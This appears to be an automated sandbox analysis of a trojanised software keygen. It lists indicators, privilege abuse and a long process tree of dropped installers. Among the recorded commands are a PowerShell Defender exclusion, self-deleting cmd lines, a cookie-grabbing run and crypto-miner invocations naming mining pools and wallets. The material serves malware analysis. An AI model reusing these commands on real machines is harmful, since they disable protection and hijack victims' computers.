Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
3660	PING.EXE
6024	PING.EXE
4372	PING.EXE
8072	PING.EXE
9880	PING.EXE

Script User-Agent 12 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	563	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	567	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	595	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	135	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	138	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	557	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	568	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	574	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	603	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	300	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	303	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	552	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2704	setups.tmp
2704	setups.tmp
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe
3728	multitimer.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeDebugPrivilege	956	MicrosoftEdge.exe
Token: SeCreateTokenPrivilege	2236	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	2236	askinstall20.exe
Token: SeLockMemoryPrivilege	2236	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	2236	askinstall20.exe
Token: SeMachineAccountPrivilege	2236	askinstall20.exe
Token: SeTcbPrivilege	2236	askinstall20.exe
Token: SeSecurityPrivilege	2236	askinstall20.exe
Token: SeTakeOwnershipPrivilege	2236	askinstall20.exe
Token: SeLoadDriverPrivilege	2236	askinstall20.exe
Token: SeSystemProfilePrivilege	2236	askinstall20.exe
Token: SeSystemtimePrivilege	2236	askinstall20.exe
Token: SeProfSingleProcessPrivilege	2236	askinstall20.exe
Token: SeIncBasePriorityPrivilege	2236	askinstall20.exe
Token: SeCreatePagefilePrivilege	2236	askinstall20.exe
Token: SeCreatePermanentPrivilege	2236	askinstall20.exe
Token: SeBackupPrivilege	2236	askinstall20.exe
Token: SeRestorePrivilege	2236	askinstall20.exe
Token: SeShutdownPrivilege	2236	askinstall20.exe
Token: SeDebugPrivilege	2236	askinstall20.exe
Token: SeAuditPrivilege	2236	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	2236	askinstall20.exe
Token: SeChangeNotifyPrivilege	2236	askinstall20.exe
Token: SeRemoteShutdownPrivilege	2236	askinstall20.exe
Token: SeUndockPrivilege	2236	askinstall20.exe
Token: SeSyncAgentPrivilege	2236	askinstall20.exe
Token: SeEnableDelegationPrivilege	2236	askinstall20.exe
Token: SeManageVolumePrivilege	2236	askinstall20.exe
Token: SeImpersonatePrivilege	2236	askinstall20.exe
Token: SeCreateGlobalPrivilege	2236	askinstall20.exe
Token: 31	2236	askinstall20.exe
Token: 32	2236	askinstall20.exe
Token: 33	2236	askinstall20.exe
Token: 34	2236	askinstall20.exe
Token: 35	2236	askinstall20.exe
Token: SeDebugPrivilege	3672	taskkill.exe
Token: SeDebugPrivilege	3728	multitimer.exe
Token: SeDebugPrivilege	956	MicrosoftEdge.exe
Token: SeDebugPrivilege	956	MicrosoftEdge.exe
Token: SeDebugPrivilege	956	MicrosoftEdge.exe
Token: SeDebugPrivilege	956	MicrosoftEdge.exe
Token: SeDebugPrivilege	4412	app.exe
Token: SeDebugPrivilege	4412	app.exe
Token: SeDebugPrivilege	4412	app.exe
Token: SeDebugPrivilege	4412	app.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
904	setups.exe
2704	setups.tmp
956	MicrosoftEdge.exe
4348	MicrosoftEdgeCP.exe
4348	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 1196 wrote to memory of 1108	1196	Embarcadero.RAD.Studio.XE2.Arc.keygen.exe	79
PID 1196 wrote to memory of 1108	1196	Embarcadero.RAD.Studio.XE2.Arc.keygen.exe	79
PID 1196 wrote to memory of 1108	1196	Embarcadero.RAD.Studio.XE2.Arc.keygen.exe	79
PID 1108 wrote to memory of 804	1108	cmd.exe	82
PID 1108 wrote to memory of 804	1108	cmd.exe	82
PID 1108 wrote to memory of 804	1108	cmd.exe	82
PID 1108 wrote to memory of 2696	1108	cmd.exe	83
PID 1108 wrote to memory of 2696	1108	cmd.exe	83
PID 1108 wrote to memory of 2696	1108	cmd.exe	83
PID 1108 wrote to memory of 1168	1108	cmd.exe	84
PID 1108 wrote to memory of 1168	1108	cmd.exe	84
PID 1108 wrote to memory of 1168	1108	cmd.exe	84
PID 1108 wrote to memory of 4000	1108	cmd.exe	85
PID 1108 wrote to memory of 4000	1108	cmd.exe	85
PID 1108 wrote to memory of 4000	1108	cmd.exe	85
PID 804 wrote to memory of 3992	804	keygen-pr.exe	86
PID 804 wrote to memory of 3992	804	keygen-pr.exe	86
PID 804 wrote to memory of 3992	804	keygen-pr.exe	86
PID 4000 wrote to memory of 956	4000	keygen-step-4.exe	100
PID 4000 wrote to memory of 956	4000	keygen-step-4.exe	100
PID 1168 wrote to memory of 1480	1168	keygen-step-3.exe	88
PID 1168 wrote to memory of 1480	1168	keygen-step-3.exe	88
PID 1168 wrote to memory of 1480	1168	keygen-step-3.exe	88
PID 1480 wrote to memory of 3660	1480	cmd.exe	90
PID 1480 wrote to memory of 3660	1480	cmd.exe	90
PID 1480 wrote to memory of 3660	1480	cmd.exe	90
PID 3992 wrote to memory of 4036	3992	key.exe	91
PID 3992 wrote to memory of 4036	3992	key.exe	91
PID 3992 wrote to memory of 4036	3992	key.exe	91
PID 956 wrote to memory of 3728	956	MicrosoftEdge.exe	92
PID 956 wrote to memory of 3728	956	MicrosoftEdge.exe	92
PID 956 wrote to memory of 904	956	MicrosoftEdge.exe	93
PID 956 wrote to memory of 904	956	MicrosoftEdge.exe	93
PID 956 wrote to memory of 904	956	MicrosoftEdge.exe	93
PID 4000 wrote to memory of 2236	4000	keygen-step-4.exe	94
PID 4000 wrote to memory of 2236	4000	keygen-step-4.exe	94
PID 4000 wrote to memory of 2236	4000	keygen-step-4.exe	94
PID 904 wrote to memory of 2704	904	setups.exe	95
PID 904 wrote to memory of 2704	904	setups.exe	95
PID 904 wrote to memory of 2704	904	setups.exe	95
PID 2236 wrote to memory of 3668	2236	askinstall20.exe	97
PID 2236 wrote to memory of 3668	2236	askinstall20.exe	97
PID 2236 wrote to memory of 3668	2236	askinstall20.exe	97
PID 3668 wrote to memory of 3672	3668	cmd.exe	99
PID 3668 wrote to memory of 3672	3668	cmd.exe	99
PID 3668 wrote to memory of 3672	3668	cmd.exe	99
PID 4000 wrote to memory of 4496	4000	keygen-step-4.exe	105
PID 4000 wrote to memory of 4496	4000	keygen-step-4.exe	105
PID 4000 wrote to memory of 4496	4000	keygen-step-4.exe	105
PID 4496 wrote to memory of 4576	4496	Full Program Features.exe	106
PID 4496 wrote to memory of 4576	4496	Full Program Features.exe	106
PID 4496 wrote to memory of 4576	4496	Full Program Features.exe	106
PID 4000 wrote to memory of 4612	4000	keygen-step-4.exe	107
PID 4000 wrote to memory of 4612	4000	keygen-step-4.exe	107
PID 4000 wrote to memory of 4612	4000	keygen-step-4.exe	107
PID 3728 wrote to memory of 4740	3728	multitimer.exe	108
PID 3728 wrote to memory of 4740	3728	multitimer.exe	108
PID 4576 wrote to memory of 4752	4576	WScript.exe	109
PID 4576 wrote to memory of 4752	4576	WScript.exe	109
PID 4576 wrote to memory of 4752	4576	WScript.exe	109

C:\Users\Admin\AppData\Local\Temp\Embarcadero.RAD.Studio.XE2.Arc.keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Embarcadero.RAD.Studio.XE2.Arc.keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1108
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:804
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3992
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:4036
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:2696
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1168
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1480
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:3660
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4000
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      PID:956
    - - C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Maps connected drives based on registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3728
      - C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe" 1 3.1617432433.60680f715a339 101
        6⤵
        Executes dropped EXE
        
        PID:4740
        
        C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\JUHY9046DQ\multitimer.exe" 2 3.1617432433.60680f715a339
        7⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\i33vn12fdjy\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\i33vn12fdjy\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\is-2RF4D.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2RF4D.tmp\Setup3310.tmp" /SL5="$702D8,138429,56832,C:\Users\Admin\AppData\Local\Temp\i33vn12fdjy\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\is-64N5L.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-64N5L.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:4164
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
        11⤵
        
        PID:5488
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:5468
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
        11⤵
        
        PID:5456
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:5656
        
        C:\Users\Admin\AppData\Local\Temp\is-E62RA.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-E62RA.tmp\LabPicV3.tmp" /SL5="$900FC,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        12⤵
        
        PID:5696
        
        C:\Users\Admin\AppData\Local\Temp\is-5Q3PN.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-5Q3PN.tmp\ppppppfy.exe" /S /UID=lab214
        13⤵
        
        PID:5160
        
        C:\Users\Admin\AppData\Local\Temp\8d-006fb-ffc-19793-00f9e64538b5c\Xalilolyha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8d-006fb-ffc-19793-00f9e64538b5c\Xalilolyha.exe"
        14⤵
        
        PID:4108
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bnw40exl.nve\md6_6ydj.exe & exit
        15⤵
        
        PID:6540
        
        C:\Users\Admin\AppData\Local\Temp\bnw40exl.nve\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\bnw40exl.nve\md6_6ydj.exe
        16⤵
        
        PID:5500
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\skdwckxt.qvy\askinstall31.exe & exit
        15⤵
        
        PID:6752
        
        C:\Users\Admin\AppData\Local\Temp\skdwckxt.qvy\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\skdwckxt.qvy\askinstall31.exe
        16⤵
        
        PID:6744
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        17⤵
        
        PID:7076
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        18⤵
        Kills process with taskkill
        
        PID:4516
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zygeealf.jgr\toolspab1.exe & exit
        15⤵
        
        PID:6932
        
        C:\Users\Admin\AppData\Local\Temp\zygeealf.jgr\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\zygeealf.jgr\toolspab1.exe
        16⤵
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\zygeealf.jgr\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\zygeealf.jgr\toolspab1.exe
        17⤵
        
        PID:7060
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ixotiru.w3e\setup_10.2_mix.exe & exit
        15⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\5ixotiru.w3e\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\5ixotiru.w3e\setup_10.2_mix.exe
        16⤵
        
        PID:8140
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dbdekgfp.1pt\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:7208
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y2hmgmbr.0s3\app.exe /8-2222 & exit
        15⤵
        
        PID:7440
        
        C:\Users\Admin\AppData\Local\Temp\y2hmgmbr.0s3\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\y2hmgmbr.0s3\app.exe /8-2222
        16⤵
        
        PID:7856
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0o0sllzc.auy\file.exe & exit
        15⤵
        
        PID:7236
        
        C:\Users\Admin\AppData\Local\Temp\0o0sllzc.auy\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\0o0sllzc.auy\file.exe
        16⤵
        
        PID:7580
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
        17⤵
        
        PID:7264
        
        C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:9156
        
        C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe" 1 3.1617432622.6068102eb76fc 101
        19⤵
        
        PID:8160
        
        C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FBMZIAV8YA\multitimer.exe" 2 3.1617432622.6068102eb76fc
        20⤵
        
        PID:5436
        
        C:\Users\Admin\AppData\Local\Temp\4mymhbbcaf4\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4mymhbbcaf4\vpn.exe" /silent /subid=482
        21⤵
        
        PID:9136
        
        C:\Users\Admin\AppData\Local\Temp\is-QSL5B.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QSL5B.tmp\vpn.tmp" /SL5="$90310,15170975,270336,C:\Users\Admin\AppData\Local\Temp\4mymhbbcaf4\vpn.exe" /silent /subid=482
        22⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\tmmegomch0w\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmmegomch0w\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:6100
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        22⤵
        
        PID:6532
        
        C:\Users\Admin\AppData\Local\Temp\a27a1af8-6393-40c8-a2c7-d779a08bf322\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a27a1af8-6393-40c8-a2c7-d779a08bf322\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a27a1af8-6393-40c8-a2c7-d779a08bf322\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        23⤵
        
        PID:9212
        
        C:\Users\Admin\AppData\Local\Temp\a27a1af8-6393-40c8-a2c7-d779a08bf322\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a27a1af8-6393-40c8-a2c7-d779a08bf322\AdvancedRun.exe" /SpecialRun 4101d8 9212
        24⤵
        
        PID:9264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        23⤵
        
        PID:9848
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        23⤵
        
        PID:10176
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        24⤵
        Delays execution with timeout.exe
        
        PID:9772
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        23⤵
        
        PID:7848
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        22⤵
        
        PID:7420
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:9476
        
        C:\Users\Admin\AppData\Local\Temp\bo0hnecejzm\2t3xdmxbadq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bo0hnecejzm\2t3xdmxbadq.exe" /ustwo INSTALL
        21⤵
        
        PID:6128
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "2t3xdmxbadq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\bo0hnecejzm\2t3xdmxbadq.exe" & exit
        22⤵
        
        PID:9732
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "2t3xdmxbadq.exe" /f
        23⤵
        Kills process with taskkill
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\rtvzyvzqmvt\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rtvzyvzqmvt\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:6560
        
        C:\Users\Admin\AppData\Local\Temp\is-DPKVF.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DPKVF.tmp\Setup3310.tmp" /SL5="$407C6,138429,56832,C:\Users\Admin\AppData\Local\Temp\rtvzyvzqmvt\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:8480
        
        C:\Users\Admin\AppData\Local\Temp\is-IUEHN.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-IUEHN.tmp\Setup.exe" /Verysilent
        23⤵
        
        PID:9624
        
        C:\Users\Admin\AppData\Local\Temp\uluq1i2xpcz\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uluq1i2xpcz\app.exe" /8-23
        21⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\1spw5l3igwt\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1spw5l3igwt\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:8956
        
        C:\Users\Admin\AppData\Local\Temp\is-G68EV.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-G68EV.tmp\vict.tmp" /SL5="$20816,870426,780800,C:\Users\Admin\AppData\Local\Temp\1spw5l3igwt\vict.exe" /VERYSILENT /id=535
        22⤵
        
        PID:7708
        
        C:\Users\Admin\AppData\Local\Temp\E51GD7V66U\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\E51GD7V66U\setups.exe" ll
        18⤵
        
        PID:9148
        
        C:\Users\Admin\AppData\Local\Temp\is-LU2EH.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LU2EH.tmp\setups.tmp" /SL5="$20742,635399,250368,C:\Users\Admin\AppData\Local\Temp\E51GD7V66U\setups.exe" ll
        19⤵
        
        PID:6776
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
        17⤵
        
        PID:8168
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"
        17⤵
        
        PID:8096
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        18⤵
        
        PID:8644
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        19⤵
        
        PID:8204
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
        17⤵
        
        PID:8800
        
        C:\Users\Admin\AppData\Roaming\CCDC.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\CCDC.tmp.exe"
        18⤵
        
        PID:5768
        
        C:\Users\Admin\AppData\Roaming\CCDC.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\CCDC.tmp.exe"
        19⤵
        
        PID:6440
        
        C:\Users\Admin\AppData\Roaming\DBB3.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\DBB3.tmp.exe"
        18⤵
        
        PID:5284
        
        C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\DBB3.tmp.exe
        19⤵
        
        PID:7584
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        20⤵
        Delays execution with timeout.exe
        
        PID:8188
        
        C:\Users\Admin\AppData\Roaming\DB93.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\DB93.tmp.exe"
        18⤵
        
        PID:8620
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:7576
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:4692
        
